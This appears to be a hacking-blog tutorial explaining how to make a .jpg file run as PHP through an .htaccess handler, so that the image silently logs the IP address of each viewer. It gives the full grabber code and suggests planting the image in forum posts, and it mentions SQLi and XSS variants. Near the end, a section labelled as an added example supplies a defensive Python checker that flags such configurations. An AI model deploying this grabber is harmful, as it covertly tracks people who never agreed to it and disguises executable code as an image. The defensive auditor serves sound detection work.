Steal IP Address using Image

Starting on the name of My god "Allah" the most beneficent the most merciful

Today I woke up and saw a post on grabbing the IP using SQL injection. Out of interest I checked what it was, and after reading it I came up with an idea to include some htaccess shit with the whole idea and BOOM!!! You'll get a kewl IP grabbing image.

In this tutorial we will learn how to grab an IP using an image. The idea is to use .htaccess along with a PHP file, and to have .jpg files executed as PHP using .htaccess. Here is the .htaccess code which makes .jpg files execute as PHP.

AddHandler application/x-httpd-php5 .jpg

Now make a grabber.jpg file with the code below.

<?php
// Append the visitor's address to the log file.
$fh = fopen('ip_list.txt', 'a');
fwrite($fh, $_SERVER['REMOTE_ADDR']."\r\n");
fclose($fh);
// n00b.png is a PNG, so it has to be loaded with the PNG loader.
$im = imagecreatefrompng("n00b.png");
// Re-encode as JPEG so the response matches the .jpg URL.
header('Content-Type: image/jpeg');
imagejpeg($im);
imagedestroy($im);
?>

Finally, put an image named n00b.png in the same folder and change the permission of grabber.jpg to 755. Your IP grabber is ready.
POC: IP_List.txt. The image below grabbed your IP when you visited this page.


So here we have our IP grabber ready to work. Now the next part is using it with SQLi to grab a person's IP. I don't find any logical reason to send an injected link to a person to grab his IP when we can directly send an image. But still, just for knowledge, here is the link to get a person's IP using SQLi. It is as simple as getting the image loaded into the browser. Now let's do the same using XSS. Here is the link to get the victim's IP using XSS.

Now a very interesting usage of this trick. Many forums allow us to include images in our posts, so we can use this trick to grab the IP addresses of anyone who visits that post.
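
Seen from the server owner's side, the two ingredients above are easy to audit for: an .htaccess line that hands an image extension to PHP, and a .jpg whose content is script rather than image data. The Python check below is an added example, not part of the original post; its function names are made up for illustration, and it looks only at AddHandler and AddType lines.

```python
import os

# Leading bytes of genuine image files, keyed by extension.
MAGIC = {".jpg": b"\xff\xd8\xff", ".jpeg": b"\xff\xd8\xff",
         ".png": b"\x89PNG\r\n\x1a\n", ".gif": b"GIF8"}

def risky_htaccess_lines(text):
    """Return (line_no, line) for AddHandler/AddType lines mapping an image extension to PHP."""
    hits = []
    for no, raw in enumerate(text.splitlines(), 1):
        parts = raw.strip().split()
        if len(parts) < 3 or parts[0].lower() not in ("addhandler", "addtype"):
            continue  # also skips blank lines and '#' comments
        if "php" not in parts[1].lower():
            continue
        # Apache accepts extensions with or without the leading dot, in any case.
        if any("." + e.lstrip(".").lower() in MAGIC for e in parts[2:]):
            hits.append((no, raw.strip()))
    return hits

def image_is_script(name, data):
    """True if an image-named file lacks its magic bytes or embeds a PHP open tag."""
    ext = os.path.splitext(name)[1].lower()
    if ext not in MAGIC:
        return False
    return not data.startswith(MAGIC[ext]) or b"<?php" in data

def audit(root):
    """Walk a web root and return sorted (path, reason) findings."""
    findings = []
    for folder, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(folder, name)
            with open(path, "rb") as fh:
                data = fh.read()
            if name == ".htaccess":
                for no, line in risky_htaccess_lines(data.decode("utf-8", "replace")):
                    findings.append((path, f"line {no}: {line}"))
            elif image_is_script(name, data):
                findings.append((path, "image extension but content is not a clean image"))
    return sorted(findings)

if __name__ == "__main__":
    # Constructed sample: the directive and the file opening shown on this page.
    print(risky_htaccess_lines("AddHandler application/x-httpd-php5 .jpg\n"))
    print(image_is_script("grabber.jpg", b"<?php\n$fh = fopen('ip_list.txt', 'a');"))
```

Pointing audit() at a site's document root lists every .htaccess line and image-named file that needs a closer look.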

Thanks for reading.

Happy Hacking